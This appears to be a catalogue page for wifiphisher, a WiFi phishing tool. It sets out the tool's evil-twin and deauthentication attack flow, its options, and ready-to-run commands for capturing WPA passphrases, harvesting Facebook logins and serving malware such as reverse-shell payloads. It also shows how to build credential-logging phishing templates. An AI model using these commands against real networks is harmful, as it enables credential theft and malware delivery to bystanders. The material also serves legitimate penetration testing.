You are here: Home » Wireless Attacks » wifiphisher

wifiphisher

wifiphisher Description

About

Wifiphisher is a security tool that mounts automated phishing attacks against WiFi networks in order to obtain secret passphrases or other credentials. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages or WPA/WPA2 secret passphrases.

Wifiphisher works on Kali Linux and is licensed under the MIT license.

How it works

After achieving a man-in-the-middle position using the Evil Twin attack, wifiphisher redirects all HTTP requests to an attacker-controlled look-alike web site.

From the victim's perspective, the attack makes use in three phases:

  1. Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by forging “Deauthenticate” or “Disassociate” packets to disrupt existing associations.
  2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled by the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue access point. After this phase, the victim is MiTMed.
  3. Victim is being served a realistic specially-customized phishing page. Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials or serves malwares. This page will be specifically crafted for the victim. For example, a router config-looking page will contain logos of the victim's vendor. The tool supports community-built templates for different phishing scenarios.

1Homepage: https://github.com/sophron/wifiphisher

Author: sophron

License: MIT OR GPL license

wifiphisher Help

usage: wifiphisher [-h] [-eI EXTENSIONSINTERFACE] [-aI APINTERFACE]
                   [-iI INTERNETINTERFACE] [-nE] [-nD] [-e ESSID] [-dE]
                   [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY]
                   [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT]
                   [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE]
                   [-iNM] [--logging] [--payload-path PAYLOAD_PATH] [-cM]
                   [-wP] [-wAI WPSPBC_ASSOC_INTERFACE] [-kB]
optional arguments:
  -h, --help            show this help message and exit
  -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE
                        Manually choose an interface that supports monitor
                        mode for deauthenticating the victims. Example: -eI
                        wlan1
  -aI APINTERFACE, --apinterface APINTERFACE
                        Manually choose an interface that supports AP mode for
                        spawning an AP. Example: -aI wlan0
  -iI INTERNETINTERFACE, --internetinterface INTERNETINTERFACE
                        Choose an interface that is connected on the
                        InternetExample: -iI ppp0
  -nE, --noextensions   Do not load any extensions.
  -nD, --nodeauth       Skip the deauthentication phase.
  -e ESSID, --essid ESSID
                        Enter the ESSID of the rogue Access Point. This option
                        will skip Access Point selection phase. Example:
                        --essid 'Free WiFi'
  -dE, --deauth-essid   Deauth all the BSSIDs having same ESSID from AP
                        selection or the ESSID given by -e option
  -p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO
                        Choose the phishing scenario to run.This option will
                        skip the scenario selection phase. Example: -p
                        firmware_upgrade
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Add WPA/WPA2 protection on the rogue Access Point.
                        Example: -pK s3cr3tp4ssw0rd
  -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE
                        Capture of the WPA/WPA2 handshakes for verifying
                        passphraseExample : -hC capture.pcap
  -qS, --quitonsuccess  Stop the script after successfully retrieving one pair
                        of credentials
  -lC, --lure10-capture
                        Capture the BSSIDs of the APs that are discovered
                        during AP selection phase. This option is part of
                        Lure10 attack.
  -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT
                        Fool the Windows Location Service of nearby Windows
                        users to believe it is within an area that was
                        previously captured with --lure10-capture. Part of the
                        Lure10 attack.
  -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE
                        Specify the MAC address of the AP interface
  -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE
                        Specify the MAC address of the extensions interface
  -iNM, --no-mac-randomization
                        Do not change any MAC address
  --logging             Log activity to file
  --payload-path PAYLOAD_PATH
                        Payload path for scenarios serving a payload
  -cM, --channel-monitor
                        Monitor if target access point changes the channel.
  -wP, --wps-pbc        Monitor if the button on a WPS-PBC Registrar is
                        pressed.
  -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE
                        The WLAN interface used for associating to the WPS
                        AccessPoint.
  -kB, --known-beacons  Broadcast a number of beacon frames advertising
                        popular WLANs

wifiphisher Usage Example

Run the tool by typing wifiphisher or python bin/wifiphisher (from inside the tool's directory).

By running the tool without any options, it will find the right interfaces and interactively ask the user to pick the ESSID of the target network (out of a list with all the ESSIDs in the around area) as well as a phishing scenario to perform. By default, the tool will perform both Evil Twin and KARMA attacks.

Use wlan0 for spawning the rogue Access Point and wlan4 for DoS attacks. Select the target network manually from the list and perform the "Firmware Upgrade" scenario. Verify that the captured Pre-Shared Key is correct by checking it against the handshake in the handshake.pcap file.

wifiphisher -aI wlan0 -eI wlan4 -p firmware-upgrade --handshake-capture handshake.pcap

Useful for manually selecting the wireless adapters. The "Firmware Upgrade" scenario is an easy way for obtaining the PSK from a password-protected network.

Automatically pick the right interfaces. Target the Wi-Fi with ESSID "CONFERENCE_WIFI" and perform the "Plugin Update" scenario. The Evil Twin will be password-protected with PSK "s3cr3tp4ssw0rd".

wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd

Useful against networks with disclosed PSKs (e.g. in conferences). The "Plugin Update" scenario provides an easy way for getting the victims to download malicious executables (e.g. malwares containing a reverse shell payload).

Do not load any extensions. Simply spawn an open Wi-Fi network with ESSID "FREE WI-FI" and perform the "OAuth Login" scenario. Use the "Known Beacons" Wi-Fi automatic association technique.

wifiphisher --noextensions --essid "FREE WI-FI" -p oauth-login -kB

Useful against victims in public areas. The "OAuth Login" scenario provides a simple way for capturing credentials from social networks, like Facebook.

Phishing Scenarios

Wifiphisher supports community-built templates for different phishing scenarios. Currently, the following phishing scenarios are in place:

  • Firmware Upgrade Page: A router configuration page without logos or brands asking for WPA/WPA2 password due to a firmware upgrade. Mobile-friendly.
  • OAuth Login Page: A free Wi-Fi Service asking for Facebook credentials to authenticate using OAuth.
  • Browser Plugin Update: A generic browser plugin update page that can be used to serve payloads to the victims.
  • Network Manager Connect: Imitates the behavior of the network manager. This template shows Chrome's "Connection Failed" page and displays a network manager window through the page asking for the pre-shared key. Currently, the network managers of Windows and MAC OS are supported.

Built-in phishing scenarios to use with -p option:

  • firmware-upgrade
  • oauth-login
  • plugin_update
  • wifi_connect

Available Phishing Scenarios:

  • 1 – Firmware Upgrade Page

A router configuration page without logos or brands asking for WPA/WPA2 password due to a firmware upgrade. Mobile-friendly.

  • 2 – Network Manager Connect

Imitates the behavior of the network manager. This template shows Chrome's "Connection Failed" page and displays a network manager window through the page asking for the pre-shared key. Currently, the network managers of Windows and MAC OS are supported.

  • 3 – OAuth Login Page

A free Wi-Fi Service asking for Facebook credentials to authenticate using OAuth

  • 4 – Browser Plugin Update

A generic browser plugin update page that can be used to serve payloads to the victims.

Creating a custom phishing scenario

For specific target-oriented attacks, custom scenarios may be necessary. Creating a phishing scenario is easy and consists of two steps:

1) Create the config.ini

A config.ini file lies in template's root directory and its contents can be divided into two sections:

Example

i) info: This section defines the scenario's characteristics.

  • Name (mandatory): The name of the phishing scenario
  • Description (mandatory): A quick description (<50 words) of the scenario
  • PayloadPath (optional): If the phishing scenario pushes malwares to victims, users can insert the absolute path of the malicious executable here

ii) context: This section is optional and holds user-defined variables that may be later injected to the template.

Here's an example of a config.ini file:

> # This is a comment
> [info]
> Name: ISP warning page
> Description: A warning page from victim's ISP asking for DSL credentials
>
> [context]
> victim_name: John Phisher
> victim_ISP: Interwebz

2) Create the template files

A template contains the static parts of the desired HTML output and may consist of several static HTML files, images, CSS or Javascript files. Dynamic languages (e.g. PHP) are not supported.

Placeholders

The HTML files may also contain some special syntax (think placeholders) describing how dynamic content will be inserted. The dynamic contect may originate from two sources:

i) Beacon frames. Beacon frames contain all the information about the target network and can be used for information gathering. The main process gathers all the interesting information and passes them to the chosen template on the runtime.

At the time of writing, the main process passes the following data:

  • target_ap_essid <str>: The ESSID of the target Access Point
  • target_ap_bssid <str>: The BSSID (MAC) address of the target Access Point
  • target_ap_channel <str<: The channel of the target Access Point
  • target_ap_vendor <str>: The vendor's name of the target Access Point
  • target_ap_logo_path <str>: The relative path of the target Access Point vendor's logo in the filesystem
  • APs_context <list>: A list containing dictionaries of the Access Points captured during the AP selection phase
  • AP <dict>: A dictionary holding the following information regarding an Access Point:
  • channel <str>: The channel of the Access Point
  • essid <str> The ESSID of the Access Point
  • bssid <str> The BSSID (MAC) address of the Access Point
  • vendor <str> The vendor's name of the Access Point

Note that the above values may be 'None' accordingly. For example, all the target_* values will be None if there user did not target an Access Point (by using --essid option). The 'target_ap_logo_path' will be None if the logo of the specific vendor does not exist in the repository.

ii) config.ini file (described above).

All the variables defined in the "Context" section may be used from within the template files. In case of naming conflicts, the variables from the configuration file will override those coming from the beacon frames.

Logging credentials

In order for wifiphisher to know which credentials to log, the values of the 'name' HTML attributes need to be prefixed with the 'wfphshr' string. During POST requests, wifiphisher will log all variables that are prefixed with this string.

Example

Here's a snippet from a template (index.html):

<p> Dear {{ victim_name }}, This is a message from {{ ISP }}.
A problem was detected regarding your {{ target_ap_vendor }} router. </p>
<p> Please write your credentials to re-connect over PPPOE/PPPOA.</p>
<input type="text" name="wphshr-username"></input>
<input type="text" name="wphshr-password"></input>

In this example, 'victim_name' and 'ISP' variables come from config.ini, while 'target_ap_vendor' variable is from the beacon frames. Both "wphshr-username" and "wphshr-password" will be logged.

How to install wifiphisher

Requirements

Following are the requirements for getting the most out of Wifiphisher:

  • Kali Linux. Although people have made Wifiphisher work on other distros, Kali Linux is the officially supported distribution, thus all new features are primarily tested on this platform.
  • One wireless network adapter that supports AP mode. Drivers should support netlink.
  • One wireless network adapter that supports Monitor mode and is capable of injection. Again, drivers should support netlink. If a second wireless network adapter is not available, you may run the tool with the --nojamming option. This will turn off the de-authentication attack though.

Installin on Kali Linux

sudo apt-get install wifiphisher hostapd dnsmasq python-pyric python-jinja2

Installin on BlackArch

sudo pacman -S wifiphisher dnsmasq hostapd net-tools python2-pyric python2-j2cli python2-jinja2 --needed

wifiphisher Screenshots

03

wifiphisher Tutorials

Related tools

Also recommended: